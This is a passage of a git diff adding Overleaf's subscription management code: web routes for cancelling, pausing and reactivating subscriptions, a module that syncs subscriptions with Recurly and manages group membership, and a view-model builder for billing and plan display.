'/user/subscription/cancel-pending', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.cancelPendingSubscriptionChange + ) + webRouter.post( + '/user/subscription/cancel', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.cancelSubscription + ) + webRouter.post( + 
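+      // :pauseCycles is the number of billing cycles to pause for, validated
+      // below as an integer of at most 12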
'/user/subscription/pause/:pauseCycles', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + pauseCycles: Joi.number().integer().max(12), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.pauseSubscription + ) + webRouter.post( + '/user/subscription/resume', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.resumeSubscription + ) + webRouter.post( + '/user/subscription/reactivate', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + SubscriptionController.reactivateSubscription + ) + + webRouter.post( + '/user/subscription/v1/cancel', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.cancelV1Subscription + ) + + webRouter.put( + '/user/subscription/extend', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.extendTrial + ) + + webRouter.post( + '/user/subscription/account/email', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.updateAccountEmailAddress + ) + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionUpdater.js b/services/web/app/src/Features/Subscription/SubscriptionUpdater.js new file mode 100644 index 0000000..2e43454 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionUpdater.js @@ -0,0 +1,453 @@ +const { db, ObjectId } = require('../../infrastructure/mongodb') +const { callbackify } = require('@overleaf/promise-utils') +const { Subscription } = require('../../models/Subscription') +const SubscriptionLocator = require('./SubscriptionLocator') +const PlansLocator = require('./PlansLocator') +const FeaturesUpdater = require('./FeaturesUpdater') +const FeaturesHelper = require('./FeaturesHelper') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const { DeletedSubscription } = require('../../models/DeletedSubscription') +const logger = require('@overleaf/logger') +const Features = require('../../infrastructure/Features') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const AccountMappingHelper = require('../Analytics/AccountMappingHelper') +const { SSOConfig } = require('../../models/SSOConfig') + +/** + * Change the admin of the given subscription. + * + * If the subscription is a group, add the new admin as manager while keeping + * the old admin. Otherwise, replace the manager. + * + * Validation checks are assumed to have been made: + * * subscription exists + * * user exists + * * user does not have another subscription + * * subscription is not a Recurly subscription + * + * If the subscription is Recurly, we silently do nothing. 
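+ * (The update below matches on `customAccount: true`, so a Recurly-backed
+ * subscription matches no document and the update is a no-op.)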
+ */ +async function updateAdmin(subscription, adminId) { + const query = { + _id: new ObjectId(subscription._id), + customAccount: true, + } + const update = { + $set: { admin_id: new ObjectId(adminId) }, + } + if (subscription.groupPlan) { + update.$addToSet = { manager_ids: new ObjectId(adminId) } + } else { + update.$set.manager_ids = [new ObjectId(adminId)] + } + await Subscription.updateOne(query, update).exec() +} + +async function syncSubscription( + recurlySubscription, + adminUserId, + requesterData = {} +) { + let subscription = + await SubscriptionLocator.promises.getUsersSubscription(adminUserId) + if (subscription == null) { + subscription = await _createNewSubscription(adminUserId) + } + await updateSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData + ) +} + +async function addUserToGroup(subscriptionId, userId) { + await UserAuditLogHandler.promises.addEntry( + userId, + 'join-group-subscription', + undefined, + undefined, + { subscriptionId } + ) + await Subscription.updateOne( + { _id: subscriptionId }, + { $addToSet: { member_ids: userId } } + ).exec() + await FeaturesUpdater.promises.refreshFeatures(userId, 'add-to-group') + await _sendUserGroupPlanCodeUserProperty(userId) + await _sendSubscriptionEvent( + userId, + subscriptionId, + 'group-subscription-joined' + ) +} + +async function removeUserFromGroup(subscriptionId, userId) { + await UserAuditLogHandler.promises.addEntry( + userId, + 'leave-group-subscription', + undefined, + undefined, + { subscriptionId } + ) + await Subscription.updateOne( + { _id: subscriptionId }, + { $pull: { member_ids: userId } } + ).exec() + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'remove-user-from-group' + ) + await _sendUserGroupPlanCodeUserProperty(userId) + await _sendSubscriptionEvent( + userId, + subscriptionId, + 'group-subscription-left' + ) +} + +async function removeUserFromAllGroups(userId) { + const subscriptions = + await SubscriptionLocator.promises.getMemberSubscriptions(userId) + if (subscriptions.length === 0) { + return + } + const subscriptionIds = subscriptions.map(sub => sub._id) + const removeOperation = { $pull: { member_ids: userId } } + + for (const subscriptionId of subscriptionIds) { + await UserAuditLogHandler.promises.addEntry( + userId, + 'leave-group-subscription', + undefined, + undefined, + { subscriptionId } + ) + } + + await Subscription.updateMany( + { _id: subscriptionIds }, + removeOperation + ).exec() + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'remove-user-from-groups' + ) + for (const subscriptionId of subscriptionIds) { + await _sendSubscriptionEvent( + userId, + subscriptionId, + 'group-subscription-left' + ) + } + await _sendUserGroupPlanCodeUserProperty(userId) +} + +async function deleteWithV1Id(v1TeamId) { + await Subscription.deleteOne({ 'overleaf.id': v1TeamId }).exec() +} + +async function deleteSubscription(subscription, deleterData) { + // 1. create deletedSubscription + await createDeletedSubscription(subscription, deleterData) + + // 2. notify analytics that members left the subscription + await _sendSubscriptionEventForAllMembers( + subscription._id, + 'group-subscription-left' + ) + + // 3. remove subscription + await Subscription.deleteOne({ _id: subscription._id }).exec() + + // 4. 
refresh users features + await _scheduleRefreshFeatures(subscription) +} + +async function restoreSubscription(subscriptionId) { + const deletedSubscription = + await SubscriptionLocator.promises.getDeletedSubscription(subscriptionId) + const subscription = deletedSubscription.subscription + + // 1. upsert subscription + await db.subscriptions.updateOne( + { _id: subscription._id }, + { $set: subscription }, + { upsert: true } + ) + + // 2. refresh users features. Do this before removing the + // subscription so the restore can be retried if this fails + await refreshUsersFeatures(subscription) + + // 3. remove deleted subscription + await DeletedSubscription.deleteOne({ + 'subscription._id': subscription._id, + }).exec() + + // 4. notify analytics that members rejoined the subscription + await _sendSubscriptionEventForAllMembers( + subscriptionId, + 'group-subscription-joined' + ) +} + +async function refreshUsersFeatures(subscription) { + const userIds = [subscription.admin_id].concat(subscription.member_ids || []) + for (const userId of userIds) { + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'subscription-updater' + ) + } +} + +async function _scheduleRefreshFeatures(subscription) { + const userIds = [subscription.admin_id].concat(subscription.member_ids || []) + for (const userId of userIds) { + await FeaturesUpdater.promises.scheduleRefreshFeatures( + userId, + 'subscription-updater' + ) + } +} + +async function createDeletedSubscription(subscription, deleterData) { + subscription.teamInvites = [] + subscription.invited_emails = [] + const filter = { 'subscription._id': subscription._id } + const data = { + deleterData: { + deleterId: deleterData.id, + deleterIpAddress: deleterData.ip, + }, + subscription, + } + const options = { upsert: true, new: true, setDefaultsOnInsert: true } + await DeletedSubscription.findOneAndUpdate(filter, data, options).exec() +} + +async function _createNewSubscription(adminUserId) { + const subscription = new Subscription({ + admin_id: adminUserId, + manager_ids: [adminUserId], + }) + await subscription.save() + return subscription +} + +async function _deleteAndReplaceSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData +) { + const adminUserId = subscription.admin_id + await deleteSubscription(subscription, requesterData) + const newSubscription = await _createNewSubscription(adminUserId) + await updateSubscriptionFromRecurly( + recurlySubscription, + newSubscription, + requesterData + ) +} + +async function updateSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData +) { + if (recurlySubscription.state === 'expired') { + const hasManagedUsersFeature = + Features.hasFeature('saas') && subscription?.managedUsersEnabled + + // If a payment lapses and if the group is managed or has group SSO, as a temporary measure we need to + // make sure that the group continues as-is and no destructive actions are taken. 
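+    // Both branches below only log a warning and skip deleteSubscription()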
+ if (hasManagedUsersFeature) { + logger.warn( + { subscriptionId: subscription._id }, + 'expired subscription has managedUsers feature enabled, skipping deletion' + ) + } else { + let hasGroupSSOEnabled = false + if (subscription?.ssoConfig) { + const ssoConfig = await SSOConfig.findOne({ + _id: subscription.ssoConfig._id || subscription.ssoConfig, + }) + .lean() + .exec() + if (ssoConfig.enabled) { + hasGroupSSOEnabled = true + } + } + + if (hasGroupSSOEnabled) { + logger.warn( + { subscriptionId: subscription._id }, + 'expired subscription has groupSSO feature enabled, skipping deletion' + ) + } else { + await deleteSubscription(subscription, requesterData) + } + } + return + } + const updatedPlanCode = recurlySubscription.plan.plan_code + const plan = PlansLocator.findLocalPlanInSettings(updatedPlanCode) + + if (plan == null) { + throw new Error(`plan code not found: ${updatedPlanCode}`) + } + if (!plan.groupPlan && subscription.groupPlan) { + // If downgrading from group to individual plan, delete group sub and create a new one + await _deleteAndReplaceSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData + ) + return + } + + const addOns = recurlySubscription?.subscription_add_ons?.map(addOn => { + return { + addOnCode: addOn.add_on_code, + quantity: addOn.quantity, + unitAmountInCents: addOn.unit_amount_in_cents, + } + }) + + subscription.recurlySubscription_id = recurlySubscription.uuid + subscription.planCode = updatedPlanCode + subscription.addOns = addOns || [] + subscription.recurlyStatus = { + state: recurlySubscription.state, + trialStartedAt: recurlySubscription.trial_started_at, + trialEndsAt: recurlySubscription.trial_ends_at, + } + + if (plan.groupPlan) { + if (!subscription.groupPlan) { + subscription.member_ids = subscription.member_ids || [] + subscription.member_ids.push(subscription.admin_id) + } + + subscription.groupPlan = true + subscription.membersLimit = plan.membersLimit + + // Some plans allow adding more seats than the base plan provides. + // This is recorded as a subscription add on. 
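+    // e.g. (hypothetical numbers) a plan with membersLimit 10 plus an
+    // additional-license add-on of quantity 5 yields membersLimit 15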
+ if ( + plan.membersLimitAddOn && + Array.isArray(recurlySubscription.subscription_add_ons) + ) { + recurlySubscription.subscription_add_ons.forEach(addOn => { + if (addOn.add_on_code === plan.membersLimitAddOn) { + subscription.membersLimit += addOn.quantity + } + }) + } + } + await subscription.save() + + const accountMapping = + AccountMappingHelper.generateSubscriptionToRecurlyMapping( + subscription._id, + subscription.recurlySubscription_id + ) + if (accountMapping) { + AnalyticsManager.registerAccountMapping(accountMapping) + } + + await _scheduleRefreshFeatures(subscription) +} + +async function _sendUserGroupPlanCodeUserProperty(userId) { + try { + const subscriptions = + await SubscriptionLocator.promises.getMemberSubscriptions(userId) + let bestPlanCode = null + let bestFeatures = {} + for (const subscription of subscriptions) { + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + if ( + plan && + FeaturesHelper.isFeatureSetBetter(plan.features, bestFeatures) + ) { + bestPlanCode = plan.planCode + bestFeatures = plan.features + } + } + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'group-subscription-plan-code', + bestPlanCode + ) + } catch (error) { + logger.error( + { err: error }, + `Failed to update group-subscription-plan-code property for user ${userId}` + ) + } +} + +async function _sendSubscriptionEvent(userId, subscriptionId, event) { + const subscription = await Subscription.findOne( + { _id: subscriptionId }, + { recurlySubscription_id: 1, groupPlan: 1 } + ) + if (!subscription || !subscription.groupPlan) { + return + } + AnalyticsManager.recordEventForUserInBackground(userId, event, { + groupId: subscription._id.toString(), + subscriptionId: subscription.recurlySubscription_id, + }) +} + +async function _sendSubscriptionEventForAllMembers(subscriptionId, event) { + const subscription = await Subscription.findOne( + { _id: subscriptionId }, + { + recurlySubscription_id: 1, + member_ids: 1, + groupPlan: 1, + } + ) + if (!subscription) { + return + } + const userIds = (subscription.member_ids || []).filter(Boolean) + for (const userId of userIds) { + if (userId) { + AnalyticsManager.recordEventForUserInBackground(userId, event, { + groupId: subscription._id.toString(), + subscriptionId: subscription.recurlySubscription_id, + }) + } + } +} + +module.exports = { + updateAdmin: callbackify(updateAdmin), + syncSubscription: callbackify(syncSubscription), + deleteSubscription: callbackify(deleteSubscription), + createDeletedSubscription: callbackify(createDeletedSubscription), + addUserToGroup: callbackify(addUserToGroup), + refreshUsersFeatures: callbackify(refreshUsersFeatures), + removeUserFromGroup: callbackify(removeUserFromGroup), + removeUserFromAllGroups: callbackify(removeUserFromAllGroups), + deleteWithV1Id: callbackify(deleteWithV1Id), + restoreSubscription: callbackify(restoreSubscription), + updateSubscriptionFromRecurly: callbackify(updateSubscriptionFromRecurly), + promises: { + updateAdmin, + syncSubscription, + addUserToGroup, + refreshUsersFeatures, + removeUserFromGroup, + removeUserFromAllGroups, + deleteSubscription, + createDeletedSubscription, + deleteWithV1Id, + restoreSubscription, + updateSubscriptionFromRecurly, + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionViewModelBuilder.js b/services/web/app/src/Features/Subscription/SubscriptionViewModelBuilder.js new file mode 100644 index 0000000..45766dd --- /dev/null +++ 
b/services/web/app/src/Features/Subscription/SubscriptionViewModelBuilder.js @@ -0,0 +1,614 @@ +// ts-check +const Settings = require('@overleaf/settings') +const RecurlyWrapper = require('./RecurlyWrapper') +const PlansLocator = require('./PlansLocator') +const { + isStandaloneAiAddOnPlanCode, + MEMBERS_LIMIT_ADD_ON_CODE, +} = require('./PaymentProviderEntities') +const SubscriptionFormatters = require('./SubscriptionFormatters') +const SubscriptionLocator = require('./SubscriptionLocator') +const SubscriptionUpdater = require('./SubscriptionUpdater') +const InstitutionsGetter = require('../Institutions/InstitutionsGetter') +const InstitutionsManager = require('../Institutions/InstitutionsManager') +const PublishersGetter = require('../Publishers/PublishersGetter') +const sanitizeHtml = require('sanitize-html') +const _ = require('lodash') +const async = require('async') +const SubscriptionHelper = require('./SubscriptionHelper') +const { callbackify } = require('@overleaf/promise-utils') +const { + InvalidError, + NotFoundError, + V1ConnectionError, +} = require('../Errors/Errors') +const FeaturesHelper = require('./FeaturesHelper') +const { formatCurrency } = require('../../util/currency') +const Modules = require('../../infrastructure/Modules') + +/** + * @import { Subscription } from "../../../../types/project/dashboard/subscription" + */ + +function buildHostedLink(type) { + return `/user/subscription/recurly/${type}` +} + +// Downgrade from Mongoose object, so we can add custom attributes to object +function serializeMongooseObject(object) { + return object && typeof object.toObject === 'function' + ? object.toObject() + : object +} + +async function getRedirectToHostedPage(userId, pageType) { + if (!['billing-details', 'account-management'].includes(pageType)) { + throw new InvalidError('unexpected page type') + } + const personalSubscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + const recurlySubscriptionId = personalSubscription?.recurlySubscription_id + if (!recurlySubscriptionId) { + throw new NotFoundError('not a recurly subscription') + } + const recurlySubscription = await RecurlyWrapper.promises.getSubscription( + recurlySubscriptionId, + { includeAccount: true } + ) + + const recurlySubdomain = Settings.apis.recurly.subdomain + const hostedLoginToken = recurlySubscription.account.hosted_login_token + if (!hostedLoginToken) { + throw new Error('recurly account does not have hosted login token') + } + let path = '' + if (pageType === 'billing-details') { + path = 'billing_info/edit?ht=' + } + return [ + 'https://', + recurlySubdomain, + '.recurly.com/account/', + path, + hostedLoginToken, + ].join('') +} + +async function buildUsersSubscriptionViewModel(user, locale = 'en') { + let { + personalSubscription, + memberGroupSubscriptions, + managedGroupSubscriptions, + currentInstitutionsWithLicence, + managedInstitutions, + managedPublishers, + fetchedPaymentRecord, + plan, + } = await async.auto({ + personalSubscription(cb) { + SubscriptionLocator.getUsersSubscription(user, cb) + }, + fetchedPaymentRecord: [ + 'personalSubscription', + ({ personalSubscription }, cb) => { + Modules.hooks.fire('getPaymentFromRecord', personalSubscription, cb) + }, + ], + plan: [ + 'personalSubscription', + ({ personalSubscription }, cb) => { + if (personalSubscription == null) { + return cb() + } + const plan = PlansLocator.findLocalPlanInSettings( + personalSubscription.planCode + ) + if (plan == null) { + return cb( + new Error( + `No plan found for planCode 
'${personalSubscription.planCode}'` + ) + ) + } + cb(null, plan) + }, + ], + memberGroupSubscriptions(cb) { + SubscriptionLocator.getMemberSubscriptions(user, cb) + }, + managedGroupSubscriptions(cb) { + SubscriptionLocator.getManagedGroupSubscriptions(user, cb) + }, + currentInstitutionsWithLicence(cb) { + InstitutionsGetter.getCurrentInstitutionsWithLicence( + user._id, + (error, institutions) => { + if (error instanceof V1ConnectionError) { + return cb(null, false) + } + cb(null, institutions) + } + ) + }, + managedInstitutions(cb) { + InstitutionsGetter.getManagedInstitutions(user._id, cb) + }, + managedPublishers(cb) { + PublishersGetter.getManagedPublishers(user._id, cb) + }, + }) + + const paymentRecord = fetchedPaymentRecord && fetchedPaymentRecord[0] + + if (memberGroupSubscriptions == null) { + memberGroupSubscriptions = [] + } else { + memberGroupSubscriptions = memberGroupSubscriptions.map(group => { + const userIsGroupManager = group.manager_ids?.some( + id => id.toString() === user._id.toString() + ) + + const groupDataForView = { + _id: group._id, + planCode: group.planCode, + teamName: group.teamName, + admin_id: { + email: group.admin_id.email, + }, + userIsGroupManager, + } + + if (group.teamNotice) { + groupDataForView.teamNotice = sanitizeHtml(group.teamNotice) + } + + buildGroupSubscriptionForView(groupDataForView) + + return groupDataForView + }) + } + + if (managedGroupSubscriptions == null) { + managedGroupSubscriptions = [] + } else { + managedGroupSubscriptions = managedGroupSubscriptions.map(group => { + const userIsGroupMember = group.member_ids?.some( + id => id.toString() === user._id.toString() + ) + + const groupDataForView = { + _id: group._id, + planCode: group.planCode, + groupPlan: group.groupPlan, + teamName: group.teamName, + admin_id: { + _id: group.admin_id._id, + email: group.admin_id.email, + }, + features: group.features, + userIsGroupMember, + } + + buildGroupSubscriptionForView(groupDataForView) + + return groupDataForView + }) + } + + if (managedInstitutions == null) { + managedInstitutions = [] + } + + personalSubscription = serializeMongooseObject(personalSubscription) + + managedInstitutions = managedInstitutions.map(serializeMongooseObject) + await Promise.all( + managedInstitutions.map(InstitutionsManager.promises.fetchV1Data) + ) + managedPublishers = managedPublishers.map(serializeMongooseObject) + await Promise.all( + managedPublishers.map(PublishersGetter.promises.fetchV1Data) + ) + + if (plan != null) { + personalSubscription.plan = plan + } + + function getPlanOnlyDisplayPrice( + totalPlanPriceInCents, + taxRate, + addOns = [] + ) { + // The MEMBERS_LIMIT_ADD_ON_CODE is considered as part of the new plan model + const allAddOnsPriceInCentsExceptAdditionalLicensePrice = addOns.reduce( + (prev, curr) => { + return curr.code !== MEMBERS_LIMIT_ADD_ON_CODE + ? 
curr.quantity * curr.unitPrice + prev + : prev + }, + 0 + ) + const allAddOnsTotalPriceInCentsExceptAdditionalLicensePrice = + allAddOnsPriceInCentsExceptAdditionalLicensePrice + + allAddOnsPriceInCentsExceptAdditionalLicensePrice * taxRate + + return formatCurrency( + totalPlanPriceInCents - + allAddOnsTotalPriceInCentsExceptAdditionalLicensePrice, + paymentRecord.subscription.currency, + locale + ) + } + + function getAddOnDisplayPricesWithoutAdditionalLicense(taxRate, addOns = []) { + return addOns.reduce((prev, curr) => { + if (curr.code !== MEMBERS_LIMIT_ADD_ON_CODE) { + const priceInCents = curr.quantity * curr.unitPrice + const totalPriceInCents = priceInCents + priceInCents * taxRate + + if (totalPriceInCents > 0) { + prev[curr.code] = formatCurrency( + totalPriceInCents, + paymentRecord.subscription.currency, + locale + ) + } + } + + return prev + }, {}) + } + + if (personalSubscription && paymentRecord && paymentRecord.subscription) { + // don't return subscription payment information + delete personalSubscription.paymentProvider + delete personalSubscription.recurly + + const tax = paymentRecord.subscription.taxAmount || 0 + // Some plans allow adding more seats than the base plan provides. + // This is recorded as a subscription add on. + // Note: taxAmount already includes the tax for any addon. + let addOnPrice = 0 + let additionalLicenses = 0 + const addOns = paymentRecord.subscription.addOns || [] + const taxRate = paymentRecord.subscription.taxRate + addOns.forEach(addOn => { + addOnPrice += addOn.quantity * addOn.unitPrice + if (addOn.code === plan.membersLimitAddOn) { + additionalLicenses += addOn.quantity + } + }) + const totalLicenses = (plan.membersLimit || 0) + additionalLicenses + personalSubscription.payment = { + taxRate, + billingDetailsLink: buildHostedLink('billing-details'), + accountManagementLink: buildHostedLink('account-management'), + additionalLicenses, + addOns, + totalLicenses, + nextPaymentDueAt: SubscriptionFormatters.formatDateTime( + paymentRecord.subscription.periodEnd + ), + nextPaymentDueDate: SubscriptionFormatters.formatDate( + paymentRecord.subscription.periodEnd + ), + currency: paymentRecord.subscription.currency, + state: paymentRecord.subscription.state, + trialEndsAtFormatted: SubscriptionFormatters.formatDateTime( + paymentRecord.subscription.trialPeriodEnd + ), + trialEndsAt: paymentRecord.subscription.trialPeriodEnd, + activeCoupons: paymentRecord.coupons, + accountEmail: paymentRecord.account.email, + hasPastDueInvoice: paymentRecord.account.hasPastDueInvoice, + pausedAt: paymentRecord.subscription.pausePeriodStart, + remainingPauseCycles: paymentRecord.subscription.remainingPauseCycles, + } + if (paymentRecord.subscription.pendingChange) { + const pendingPlanCode = + paymentRecord.subscription.pendingChange.nextPlanCode + const pendingPlan = PlansLocator.findLocalPlanInSettings(pendingPlanCode) + if (pendingPlan == null) { + throw new Error(`No plan found for planCode '${pendingPlanCode}'`) + } + let pendingAdditionalLicenses = 0 + let pendingAddOnTax = 0 + let pendingAddOnPrice = 0 + if (paymentRecord.subscription.pendingChange.nextAddOns) { + const pendingAddOns = + paymentRecord.subscription.pendingChange.nextAddOns + pendingAddOns.forEach(addOn => { + pendingAddOnPrice += addOn.quantity * addOn.unitPrice + if (addOn.code === pendingPlan.membersLimitAddOn) { + pendingAdditionalLicenses += addOn.quantity + } + }) + // Need to calculate tax ourselves as we don't get tax amounts for pending subs + pendingAddOnTax = + 
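            // Judging by the naming above (totalPlanPriceInCents), prices
            // are in cents and taxRate is a fraction (e.g. 0.2 for 20%),
            // so this estimate stays in cents.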
personalSubscription.payment.taxRate * pendingAddOnPrice + pendingPlan.addOns = pendingAddOns + } + const pendingSubscriptionTax = + personalSubscription.payment.taxRate * + paymentRecord.subscription.pendingChange.nextPlanPrice + const totalPrice = + paymentRecord.subscription.pendingChange.nextPlanPrice + + pendingAddOnPrice + + pendingAddOnTax + + pendingSubscriptionTax + + personalSubscription.payment.displayPrice = formatCurrency( + totalPrice, + paymentRecord.subscription.currency, + locale + ) + personalSubscription.payment.planOnlyDisplayPrice = + getPlanOnlyDisplayPrice( + totalPrice, + taxRate, + paymentRecord.subscription.pendingChange.nextAddOns + ) + personalSubscription.payment.addOnDisplayPricesWithoutAdditionalLicense = + getAddOnDisplayPricesWithoutAdditionalLicense( + taxRate, + paymentRecord.subscription.pendingChange.nextAddOns + ) + const pendingTotalLicenses = + (pendingPlan.membersLimit || 0) + pendingAdditionalLicenses + personalSubscription.payment.pendingAdditionalLicenses = + pendingAdditionalLicenses + personalSubscription.payment.pendingTotalLicenses = pendingTotalLicenses + personalSubscription.pendingPlan = pendingPlan + } else { + const totalPrice = paymentRecord.subscription.planPrice + addOnPrice + tax + personalSubscription.payment.displayPrice = formatCurrency( + totalPrice, + paymentRecord.subscription.currency, + locale + ) + personalSubscription.payment.planOnlyDisplayPrice = + getPlanOnlyDisplayPrice(totalPrice, taxRate, addOns) + personalSubscription.payment.addOnDisplayPricesWithoutAdditionalLicense = + getAddOnDisplayPricesWithoutAdditionalLicense(taxRate, addOns) + } + } + + return { + personalSubscription, + managedGroupSubscriptions, + memberGroupSubscriptions, + currentInstitutionsWithLicence, + managedInstitutions, + managedPublishers, + } +} + +/** + * @param {{_id: string}} user + * @returns {Promise<Subscription>} + */ +async function getBestSubscription(user) { + let [ + individualSubscription, + memberGroupSubscriptions, + currentInstitutionsWithLicence, + ] = await Promise.all([ + SubscriptionLocator.promises.getUsersSubscription(user), + SubscriptionLocator.promises.getMemberSubscriptions(user), + InstitutionsGetter.promises.getCurrentInstitutionsWithLicence(user._id), + ]) + if ( + individualSubscription && + !individualSubscription.customAccount && + individualSubscription.recurlySubscription_id && + !individualSubscription.recurlyStatus?.state + ) { + const recurlySubscription = await RecurlyWrapper.promises.getSubscription( + individualSubscription.recurlySubscription_id, + { includeAccount: true } + ) + await SubscriptionUpdater.promises.updateSubscriptionFromRecurly( + recurlySubscription, + individualSubscription + ) + individualSubscription = + await SubscriptionLocator.promises.getUsersSubscription(user) + } + let bestSubscription = { + type: 'free', + } + if (currentInstitutionsWithLicence?.length) { + for (const institutionMembership of currentInstitutionsWithLicence) { + const plan = PlansLocator.findLocalPlanInSettings( + Settings.institutionPlanCode + ) + if (_isPlanEqualOrBetter(plan, bestSubscription.plan)) { + bestSubscription = { + type: 'commons', + subscription: institutionMembership, + plan, + } + } + } + } + if (memberGroupSubscriptions?.length) { + for (const groupSubscription of memberGroupSubscriptions) { + const plan = PlansLocator.findLocalPlanInSettings( + groupSubscription.planCode + ) + if (_isPlanEqualOrBetter(plan, bestSubscription.plan)) { + const groupDataForView = {} + if (groupSubscription.teamName) 
{ + groupDataForView.teamName = groupSubscription.teamName + } + const remainingTrialDays = _getRemainingTrialDays(groupSubscription) + bestSubscription = { + type: 'group', + subscription: groupDataForView, + plan, + remainingTrialDays, + } + } + } + } + if (individualSubscription && !individualSubscription.groupPlan) { + if ( + isStandaloneAiAddOnPlanCode(individualSubscription.planCode) && + bestSubscription.type === 'free' + ) { + bestSubscription = { type: 'standalone-ai-add-on' } + } else { + const plan = PlansLocator.findLocalPlanInSettings( + individualSubscription.planCode + ) + if (_isPlanEqualOrBetter(plan, bestSubscription.plan)) { + const remainingTrialDays = _getRemainingTrialDays( + individualSubscription + ) + bestSubscription = { + type: 'individual', + subscription: individualSubscription, + plan, + remainingTrialDays, + } + } + } + } + return bestSubscription +} + +function buildPlansList(currentPlan) { + const { plans } = Settings + + const allPlans = {} + plans.forEach(plan => { + allPlans[plan.planCode] = plan + }) + + const result = { allPlans } + + if (currentPlan) { + result.planCodesChangingAtTermEnd = _.map( + _.filter(plans, plan => { + if (!plan.hideFromUsers) { + return SubscriptionHelper.shouldPlanChangeAtTermEnd(currentPlan, plan) + } + }), + 'planCode' + ) + } + + result.studentAccounts = _.filter( + plans, + plan => plan.planCode.indexOf('student') !== -1 + ) + + result.groupMonthlyPlans = _.filter( + plans, + plan => plan.groupPlan && !plan.annual + ) + + result.groupAnnualPlans = _.filter( + plans, + plan => plan.groupPlan && plan.annual + ) + + result.individualMonthlyPlans = _.filter( + plans, + plan => + !plan.groupPlan && + !plan.annual && + plan.planCode !== 'personal' && // Prevent the personal plan from appearing on the change-plans page + plan.planCode.indexOf('student') === -1 + ) + + result.individualAnnualPlans = _.filter( + plans, + plan => + !plan.groupPlan && plan.annual && plan.planCode.indexOf('student') === -1 + ) + + return result +} + +function _isPlanEqualOrBetter(planA, planB) { + return FeaturesHelper.isFeatureSetBetter( + planA?.features || {}, + planB?.features || {} + ) +} + +function _getRemainingTrialDays(subscription) { + const now = new Date() + const trialEndDate = subscription.recurlyStatus?.trialEndsAt + return trialEndDate && trialEndDate > now + ? Math.ceil( + (trialEndDate.getTime() - now.getTime()) / (24 * 60 * 60 * 1000) + ) + : -1 +} + +function buildGroupSubscriptionForView(groupSubscription) { + // most group plans in Recurly should be in form "group_plancode_size_usage" + const planLevelFromGroupPlanCode = groupSubscription.planCode.substr(6, 12) + if (planLevelFromGroupPlanCode === 'professional') { + groupSubscription.planLevelName = 'Professional' + } else if (planLevelFromGroupPlanCode === 'collaborator') { + groupSubscription.planLevelName = 'Standard' + } + // there are some group subscription entries that have the personal plancodes... + // this fallback tries to still show the right thing in these cases: + if (!groupSubscription.planLevelName) { + if (groupSubscription.planCode.startsWith('professional')) { + groupSubscription.planLevelName = 'Professional' + } else if (groupSubscription.planCode.startsWith('collaborator')) { + groupSubscription.planLevelName = 'Standard' + } else { + // if we still don't have anything, we can show the plan name (eg, v1 Pro): + const plan = PlansLocator.findLocalPlanInSettings( + groupSubscription.planCode + ) + groupSubscription.planLevelName = plan + ? 
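          // e.g. for planCode 'group_collaborator_10_educational' the
          // substr(6, 12) above yields 'collaborator', which maps to the
          // 'Standard' display name; this final fallback only runs when
          // neither naming convention matched.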
plan.name + : groupSubscription.planCode + } + } +} + +function buildPlansListForSubscriptionDash(currentPlan) { + const allPlansData = buildPlansList(currentPlan) + const plans = [] + // only list individual and visible plans for "change plans" UI + if (allPlansData.studentAccounts) { + plans.push( + ...allPlansData.studentAccounts.filter(plan => !plan.hideFromUsers) + ) + } + if (allPlansData.individualMonthlyPlans) { + plans.push( + ...allPlansData.individualMonthlyPlans.filter(plan => !plan.hideFromUsers) + ) + } + if (allPlansData.individualAnnualPlans) { + plans.push( + ...allPlansData.individualAnnualPlans.filter(plan => !plan.hideFromUsers) + ) + } + + return { + plans, + planCodesChangingAtTermEnd: allPlansData.planCodesChangingAtTermEnd, + } +} + +module.exports = { + buildUsersSubscriptionViewModel: callbackify(buildUsersSubscriptionViewModel), + buildPlansList, + buildPlansListForSubscriptionDash, + getBestSubscription: callbackify(getBestSubscription), + promises: { + buildUsersSubscriptionViewModel, + getRedirectToHostedPage, + getBestSubscription, + }, +} diff --git a/services/web/app/src/Features/Subscription/TeamInvitesController.mjs b/services/web/app/src/Features/Subscription/TeamInvitesController.mjs new file mode 100644 index 0000000..ca50875 --- /dev/null +++ b/services/web/app/src/Features/Subscription/TeamInvitesController.mjs @@ -0,0 +1,307 @@ +import settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import TeamInvitesHandler from './TeamInvitesHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import SubscriptionLocator from './SubscriptionLocator.js' +import ErrorController from '../Errors/ErrorController.js' +import EmailHelper from '../Helpers/EmailHelper.js' +import UserGetter from '../User/UserGetter.js' +import { expressify } from '@overleaf/promise-utils' +import HttpErrorHandler from '../Errors/HttpErrorHandler.js' +import PermissionsManager from '../Authorization/PermissionsManager.js' +import EmailHandler from '../Email/EmailHandler.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import Modules from 